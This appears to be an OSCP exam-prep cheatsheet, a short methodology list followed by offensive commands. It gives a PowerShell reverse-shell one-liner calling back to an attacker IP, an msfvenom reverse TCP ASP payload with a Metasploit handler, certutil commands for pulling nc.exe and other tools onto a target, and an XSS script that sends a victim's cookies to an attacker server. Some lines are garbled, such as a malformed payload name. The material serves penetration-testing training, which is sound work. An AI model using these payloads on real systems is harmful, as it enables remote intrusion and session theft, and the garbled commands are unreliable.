OSCP Methodology


The checklist aim to assist OSCP students with a baseline methodology for the labs and exam environments. 

  • Scanning
  • Enumeration
  • Exploitation
  • Privilege Escalation
  • Flags
  • Post Exploitation

Quick Command Cheatsheet

Lsof -I
Kill -9 PID
Kill a specific service that you don’t use anymore.
rdesktop -g 90%  $IP
Remote desktop with screen area set to 90%.
 python -m SimpleHTTPServer 8000

certutil.exe -urlcache -split -f

certutil.exe -urlcache -split -f accesschk.txt 
certutil.exe -urlcache -split -f icacls.exe 
certutil.exe -urlcache -split -f nc.exe

Transfer files using Certutil.  This has been my rock during the OSCP challenge. Host a webserver on your box, I’ve used python webserver.
msfvenom -p windows/shell/reverse_tcp LHOST= LPORT=3333 -f asp > wireshell.asp

Within metasploit:
use exploit/multi/handler
set payload sho/x86/shell/reverse_tcp  
set lhost
set lport 3333

Multi/Handler example. Allowed during the exam.
$client = New-Object System.Net.Sockets.TCPClient("10.10.XX.XX",77);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Shell using powershell TCP one liner.
Create cookie.js file.
filevar img = document.createElement (“img”);
img.src = http://youipaddress/ddos? + escape(document.cookie);

Copy to webserver and inject.
'">><script src="http://10.XX.XX.XX/cookie.js"></script>

Stealing cookies using XSS.

Non OSCP machines

Some CTF machines you can practice on before taking the OSCP challenge.